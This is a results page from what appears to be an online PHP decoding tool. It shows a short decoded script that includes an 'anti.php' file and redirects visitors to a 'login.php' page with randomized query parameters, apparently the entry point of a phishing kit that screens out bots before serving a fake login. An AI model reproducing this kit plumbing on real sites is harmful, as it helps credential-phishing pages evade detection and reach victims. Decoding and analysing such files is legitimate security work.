Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php include('./anti.php'); header("location:./login.php?websrc=".md5('X-moustache'..

Decoded Output download

<?php 
 
include('./anti.php'); 
 
header("location:./login.php?websrc=".md5('X-moustache')."&dispatched=".rand(20,100)."&id=".rand(10000000000,500000000)." "); 
 
?>

Did this file decode correctly?

Original Code

<?php

include('./anti.php');

header("location:./login.php?websrc=".md5('X-moustache')."&dispatched=".rand(20,100)."&id=".rand(10000000000,500000000)." ");

?>

Function Calls

None

Variables

None

Stats

MD5 972d5093a9ea35b12317631a0fa1b2aa
Eval Count 0
Decode Time 86 ms